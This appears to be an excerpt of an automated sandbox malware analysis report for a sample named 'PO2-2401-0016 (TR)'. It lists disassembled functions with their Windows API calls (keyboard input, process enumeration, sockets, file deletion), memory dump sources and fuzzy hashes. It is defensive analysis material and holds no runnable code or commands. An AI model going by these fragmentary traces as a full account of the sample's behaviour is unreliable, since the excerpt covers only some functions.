                                • Instruction Fuzzy Hash: 7011E331240288BFEF205F69DC46FAB7BACEF99B64F010124FA55E6090D371D8619B50
                                Function 001B2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                  • Part of subcall function 001B2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001B2DC5
                                  • Part of subcall function 001B2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 001B2DD6
                                  • Part of subcall function 001B2DA7: GetCurrentThreadId.KERNEL32 ref: 001B2DDD
                                  • Part of subcall function 001B2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001B2DE4
                                • GetFocus.USER32 ref: 001B2F78
                                  • Part of subcall function 001B2DEE: GetParent.USER32(00000000), ref: 001B2DF9
                                • GetClassNameW.USER32(?,?,00000100), ref: 001B2FC3
                                • EnumChildWindows.USER32(?,001B303B), ref: 001B2FEB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                • String ID: %s%d
                                • API String ID: 1272988791-1110647743
                                • Opcode ID: e0311200b85fdea131d6ef3f919d41024adc6766e37fd0f756edb1ee1a12dfda
                                • Instruction ID: aeb4f28968df2c37d281e3ec64f33db628ec5389d756338d2afc41b5962f4cbc
                                • Opcode Fuzzy Hash: e0311200b85fdea131d6ef3f919d41024adc6766e37fd0f756edb1ee1a12dfda
                                • Instruction Fuzzy Hash: CF11B471700205ABCF147FB08CC5EEE776AAFA9304F044075FD199B252DF70994A8BA0
                                Function 001E5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001E58C1
                                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001E58EE
                                • DrawMenuBar.USER32(?), ref: 001E58FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Menu$InfoItem$Draw
                                • String ID: 0
                                • API String ID: 3227129158-4108050209
                                • Opcode ID: b6ed091007540f80ccb5e6a7c7d13f0519622a610fb17b389dae470af9381fee
                                • Instruction ID: f4d0346a56bdf7918586f3873aa8091c0fb720261c98aef7a2bb8f9728d75ccb
                                • Opcode Fuzzy Hash: b6ed091007540f80ccb5e6a7c7d13f0519622a610fb17b389dae470af9381fee
                                • Instruction Fuzzy Hash: E701AD31600688EFDB209F52EC44BEEBFB5FF45369F008099E848DA152DB308A91DF20
                                Function 001AD3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 001AD3BF
                                • FreeLibrary.KERNEL32 ref: 001AD3E5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AddressFreeLibraryProc
                                • String ID: GetSystemWow64DirectoryW$X64
                                • API String ID: 3013587201-2590602151
                                • Opcode ID: cff1ae8270fda0e63b141e4d0fb782356f8e9515f18fa6d2f27ce5feb5cea9fd
                                • Instruction ID: 7fbf4d3b65e264529e84065f51a90e0024ba89d40263040fbe092a3435428beb
                                • Opcode Fuzzy Hash: cff1ae8270fda0e63b141e4d0fb782356f8e9515f18fa6d2f27ce5feb5cea9fd
                                • Instruction Fuzzy Hash: 5AF05569802E21DBCB3543116C54AAD3324BF12741B5A415AF403F5808DB20CD95C2C2
                                Function 001B007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a280207e0aecd811d9e1302a72bde27c76ea24e314fe2f10bf85aab834fddc70
                                • Instruction ID: cb3ccee6a1ee809fd691ac93f07862a2dd6d692361922131878023ea9a06bf95
                                • Opcode Fuzzy Hash: a280207e0aecd811d9e1302a72bde27c76ea24e314fe2f10bf85aab834fddc70
                                • Instruction Fuzzy Hash: 58C14C75A0021AEFDB15CFA8C898AAEB7B5FF48704F118598E505EB261D731ED81CB90
                                Function 001D342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Variant$ClearInitInitializeUninitialize
                                • String ID:
                                • API String ID: 1998397398-0
                                • Opcode ID: c9e6c1399c59fb1996be3c9bf62e2462604a07d79d4a2f47817a11cf5f6f6396
                                • Instruction ID: e7d70af082f41b1b90189db9ab7fba10cf62b3b0b52a78c2ed31423220d1313b
                                • Opcode Fuzzy Hash: c9e6c1399c59fb1996be3c9bf62e2462604a07d79d4a2f47817a11cf5f6f6396
                                • Instruction Fuzzy Hash: CBA13D75604300DFC704DF28D485A2AB7E5FF98715F05885AF9999B3A1DB30EE05CB92
                                Function 001B0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                Download Yara Rule
                                APIs
                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,001EFC08,?), ref: 001B05F0
                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,001EFC08,?), ref: 001B0608
                                • CLSIDFromProgID.OLE32(?,?,00000000,001ECC40,000000FF,?,00000000,00000800,00000000,?,001EFC08,?), ref: 001B062D
                                • _memcmp.LIBVCRUNTIME ref: 001B064E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FromProg$FreeTask_memcmp
                                • String ID:
                                • API String ID: 314563124-0
                                • Opcode ID: 228ce35680434a1cd5918676e3822a2dd4220a4df71b777d3281d910ec8ea6fe
                                • Instruction ID: e39592b26319df60fdc9b23054b8e0f4436dd13f782a0ead90e763e7c9cc0fb0
                                • Opcode Fuzzy Hash: 228ce35680434a1cd5918676e3822a2dd4220a4df71b777d3281d910ec8ea6fe
                                • Instruction Fuzzy Hash: 53810971A00209EFCB05DF98C984EEEB7B9FF89315F204558E516EB250DB71AE46CB60
                                Function 00191391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: d19c58542035b89ec82fb8ae987c8fb0d57feb8534b5642bd6f4274a760b994c
                                • Instruction ID: bb03df5c9737b60ce2ec77978f155002fe242829ef646c085acb5c293937fe60
                                • Opcode Fuzzy Hash: d19c58542035b89ec82fb8ae987c8fb0d57feb8534b5642bd6f4274a760b994c
                                • Instruction Fuzzy Hash: B4414731A00102BBDF257BF89C466BE3AB4FF69370F254225F81897192E73489C18762
                                Function 001E6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowRect.USER32(00E1FB68,?), ref: 001E62E2
                                • ScreenToClient.USER32(?,?), ref: 001E6315
                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 001E6382
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$ClientMoveRectScreen
                                • String ID:
                                • API String ID: 3880355969-0
                                • Opcode ID: 8b681f46cfa9fff5615ef6bea497bbac3969f2a407c1632820a731b0ba257b3d
                                • Instruction ID: 15959797951c1ad14625715ee0d381cd75643190966e0d75b73b29a7f73d56c2
                                • Opcode Fuzzy Hash: 8b681f46cfa9fff5615ef6bea497bbac3969f2a407c1632820a731b0ba257b3d
                                • Instruction Fuzzy Hash: BF516274900685EFCF10DF55D8849AE7BB6FF653A0F508159F9159B290D730ED81CB90
                                Function 001D1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                Download Yara Rule
                                APIs
                                • socket.WSOCK32(00000002,00000002,00000011), ref: 001D1AFD
                                • WSAGetLastError.WSOCK32 ref: 001D1B0B
                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001D1B8A
                                • WSAGetLastError.WSOCK32 ref: 001D1B94
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLast$socket
                                • String ID:
                                • API String ID: 1881357543-0
                                • Opcode ID: 882fd889794751b86f880626c1f64a85ddf3807fb70bab3d8b8ec18415d88373
                                • Instruction ID: dc9e653a9dbf206e6a483291d1a077dc99d5ca9fe0ebd34a7cc33a2bfb1aca87
                                • Opcode Fuzzy Hash: 882fd889794751b86f880626c1f64a85ddf3807fb70bab3d8b8ec18415d88373
                                • Instruction Fuzzy Hash: B041A034600200BFE720AF24D886F2A77E5AB58718F54845DF96A9F7D2D772ED42CB90
                                Function 0018B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b7e1381281c8f8686ab8de43496ab58c45e9420f108623c2a2f6f954c5b532fe
                                • Instruction ID: f2e776e55a859074d6a0b3395ef26b1f5ccc7a646f84079ab6d2fdb41c2dc6b4
                                • Opcode Fuzzy Hash: b7e1381281c8f8686ab8de43496ab58c45e9420f108623c2a2f6f954c5b532fe
                                • Instruction Fuzzy Hash: 60412B72A04304BFD725AF38CC82B6B7BE9EB94710F10452EF546DB292D3719A418B90
                                Function 001C56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001C5783
                                • GetLastError.KERNEL32(?,00000000), ref: 001C57A9
                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001C57CE
                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001C57FA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateHardLink$DeleteErrorFileLast
                                • String ID:
                                • API String ID: 3321077145-0
                                • Opcode ID: 30d101164f9f194c94368aeefd8349b2dd5f9df86e0b44b440dcdd8d9c743948
                                • Instruction ID: 733dc6b9b03cdf19e4a0c0efbcba7eb371cf318c280a8343bf32ded21fccd3d1
                                • Opcode Fuzzy Hash: 30d101164f9f194c94368aeefd8349b2dd5f9df86e0b44b440dcdd8d9c743948
                                • Instruction Fuzzy Hash: 74415D39600610DFCB10DF55D485A5EBBE2EF99321B198488EC5AAF3A2DB30FD45CB91
                                Function 0018D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00176D71,00000000,00000000,001782D9,?,001782D9,?,00000001,00176D71,8BE85006,00000001,001782D9,001782D9), ref: 0018D910
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0018D999
                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0018D9AB
                                • __freea.LIBCMT ref: 0018D9B4
                                  • Part of subcall function 00183820: RtlAllocateHeap.NTDLL(00000000,?,00221444,?,0016FDF5,?,?,0015A976,00000010,00221440,001513FC,?,001513C6,?,00151129), ref: 00183852
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                • String ID:
                                • API String ID: 2652629310-0
                                • Opcode ID: 3e76ae07e1325d50afdaa2586979d84d27a519f733d59ce19434bdb47ceb0573
                                • Instruction ID: fd4bb9f7dea0009ab7939417fff7d172ac2bddd42fa3f90be23e9203136373e1
                                • Opcode Fuzzy Hash: 3e76ae07e1325d50afdaa2586979d84d27a519f733d59ce19434bdb47ceb0573
                                • Instruction Fuzzy Hash: B731D272A0021AABDF25AF65EC41EAE7BA5EB41714F054168FC08D7190EB35CE51CB90
                                Function 001E52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 001E5352
                                • GetWindowLongW.USER32(?,000000F0), ref: 001E5375
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001E5382
                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001E53A8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: LongWindow$InvalidateMessageRectSend
                                • String ID:
                                • API String ID: 3340791633-0
                                • Opcode ID: 6ddcfbc5c881e481c6dcf27d6a83fc9ead0e6f431b5b1ac3b676930c20402cbf
                                • Instruction ID: 2f491a41d5217aa22529be37b900f4ffd0c0111fb5350edc33af9b2b97fbca84
                                • Opcode Fuzzy Hash: 6ddcfbc5c881e481c6dcf27d6a83fc9ead0e6f431b5b1ac3b676930c20402cbf
                                • Instruction Fuzzy Hash: BA31DE34A55E88EFEB349A56CC46FED7767BB04398F584102FA10962E1C7B09980DB82
                                Function 001BAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 001BABF1
                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 001BAC0D
                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 001BAC74
                                • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 001BACC6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: KeyboardState$InputMessagePostSend
                                • String ID:
                                • API String ID: 432972143-0
                                • Opcode ID: 6477ab89c30603a7aba665810f201caeed835101f4099f51ddf11a32736d61c5
                                • Instruction ID: f37f863ee7e4d19b67551c6ca7b10cd812deb7ff55473df822427f5c7b52313f
                                • Opcode Fuzzy Hash: 6477ab89c30603a7aba665810f201caeed835101f4099f51ddf11a32736d61c5
                                • Instruction Fuzzy Hash: E9314630A00358AFFF35CB65CC497FE7FA5AF89310F84431AE481962D1D374998187A2
                                Function 001E7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                Download Yara Rule
                                APIs
                                • ClientToScreen.USER32(?,?), ref: 001E769A
                                • GetWindowRect.USER32(?,?), ref: 001E7710
                                • PtInRect.USER32(?,?,001E8B89), ref: 001E7720
                                • MessageBeep.USER32(00000000), ref: 001E778C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Rect$BeepClientMessageScreenWindow
                                • String ID:
                                • API String ID: 1352109105-0
                                • Opcode ID: 4629f8127e45e0c8963f1aa0c37110ea99fda3b5b60cafb8b862a192fbb9d5a2
                                • Instruction ID: a3581d90bca773694823afcefeba1646b45447e3f13d2e62680492b372ca3202
                                • Opcode Fuzzy Hash: 4629f8127e45e0c8963f1aa0c37110ea99fda3b5b60cafb8b862a192fbb9d5a2
                                • Instruction Fuzzy Hash: 0841A034A05694EFEB11CF9AD898EADB7F4FF59304F1540A8E4149B2A1C330A982CF90
                                Function 001E16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                Download Yara Rule
                                APIs
                                • GetForegroundWindow.USER32 ref: 001E16EB
                                  • Part of subcall function 001B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001B3A57
                                  • Part of subcall function 001B3A3D: GetCurrentThreadId.KERNEL32 ref: 001B3A5E
                                  • Part of subcall function 001B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001B25B3), ref: 001B3A65
                                • GetCaretPos.USER32(?), ref: 001E16FF
                                • ClientToScreen.USER32(00000000,?), ref: 001E174C
                                • GetForegroundWindow.USER32 ref: 001E1752
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                • String ID:
                                • API String ID: 2759813231-0
                                • Opcode ID: d3b4568b24014f481bf9af61d4623a5633ab50429f6427e0f9ca334ea04c68d4
                                • Instruction ID: c278c9112368146cd88649b30dac667456a3d0518a0da61756d4290197422b01
                                • Opcode Fuzzy Hash: d3b4568b24014f481bf9af61d4623a5633ab50429f6427e0f9ca334ea04c68d4
                                • Instruction Fuzzy Hash: B7314171D00249AFC704EFAAC8C1CEEB7F9EF59304B50806AE425EB251D7719E45CBA0
                                Function 001BD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32 ref: 001BD501
                                • Process32FirstW.KERNEL32(00000000,?), ref: 001BD50F
                                • Process32NextW.KERNEL32(00000000,?), ref: 001BD52F
                                • CloseHandle.KERNEL32(00000000), ref: 001BD5DC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
